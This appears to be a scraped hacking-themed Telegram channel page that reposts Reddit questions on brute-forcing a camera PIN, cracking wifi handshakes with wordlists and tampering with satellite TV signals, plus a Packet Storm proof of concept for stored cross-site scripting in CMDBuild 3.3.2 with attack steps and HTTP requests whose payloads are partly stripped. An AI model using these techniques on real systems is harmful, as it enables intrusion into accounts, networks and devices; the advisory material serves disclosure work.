Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
I really like Account Takeovers So when I test any Website It is my first choice to test :)Continue reading on Medium » (https://medium.com/@sarafsaransh321/how-a-bit-of-observation-gave-me-my-second-account-takeover-707e76b9c9f2?source=rss------bug_bounty-5)
hacking: security in practice
How would you crack a 4 digit locked night vision hunting camera?

Hi. So I found a hunting camera in a storage unit but after trying to turn it on, I saw it was locked by a 4 digit code. It only has a set of four arrow keys and an ok key so no numpad. It also has a micro USB port. How would one unlock such camera?

Edit: I'm thinking like soomething that brute forces it but automatically I don't wanna manually try 10k different combinations.

submitted by /u/tryerxintensity
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Which wpa dictionaries do you use for Indian wifi networks?

I generally use rockyou, probable, other default ones from kali/parrot, all 8 digit numbers, darkc0de and small ones from wpa-sec.stanev.

Also, I upload the handshakes to wpa-sec.stanev and onlinehashcrack as they crack it for free. But what if I'm still not able to crack it? Any more wordlists suggestions please?

I have hashcat with 150 kH/s. Thanks

submitted by /u/U1karsh
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Trying to intercept the data transmitted in DTH Signals, or even send signals to the STB.

The STB operates on the Ku band(12-18 GHz) Used these to find some information: https://www.lyngsat.com/ Location of STB: India

Couldn’t find any information about the laws related to modification of DTH signals. Please inform me if it’s crime, if it’s not please tell me how i can proceed.

This is purely for educational purposes only.

submitted by /u/barathrajkb
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
File Explore WLAN

My iPhone is locked and I need to reference a file a for work. Slightly urgent but is there any way to access my iPhone via file exploring on either my pc or tablet since they're all on the same network?

submitted by /u/Silky_Johnson7
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
CMDBuild 3.3.2 Cross Site Scripting

https://3.bp.blogspot.com/-sRAbWielMtM/WWlvVvmDA-I/AAAAAAAAIN8/PunzJUFKKskcHl_zTOrA6xP6ETTvhbejQCLcBGAs/s1600/h46.png
CMDBuild version 3.3.2 suffers from cross site scripting vulnerabilities.

MD5 | 5c78cbeb9008e6af507f9096fd21c949

Download
# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
# Date: 15/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.cmdbuild.org
# Software Link: https://www.cmdbuild.org/en/download/latest-version
# Version: CMDBuild 3.3.2
# Tested on: Linux

Summary:

Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections

Proof of concepts :

Stored Xss Example:

1-Login to you'r Dashboard As a low privilege user
2-Click On Basic archives and Employee
3- +Add card Employee
4- Enter your xss payload in parameters
5-On added employee click on "Open Relation Graph"

POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
...
Cmdbuild-Actionid: class.card.new.open
Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353

Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
X-Requested-With: XMLHttpRequest
Content-Length: 302
Connection: close

{"_type":"Employee","_tenant":"","Code":"\">x ","Description":null,"Surname":"\">x ","Name":"\">x ","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}
------------------------------------------------------------------------
File upload Xss example:

1-Click on Basic archives
2-Click on Workplace - + Add card Workplace
3-Select "attachments" icon - +Add attachment + image
4-Upload your svg file with xss payload
5-Click on preview and Right click open in new tab
Request:
POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
Cmdbuild-Actionid: class.card.attachments.open

-----------------------------269319782833689825543405205260
Content-Disposition: form-data; name="file"; filename="kiwi.svg"
Content-Type: image/svg+xml



Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video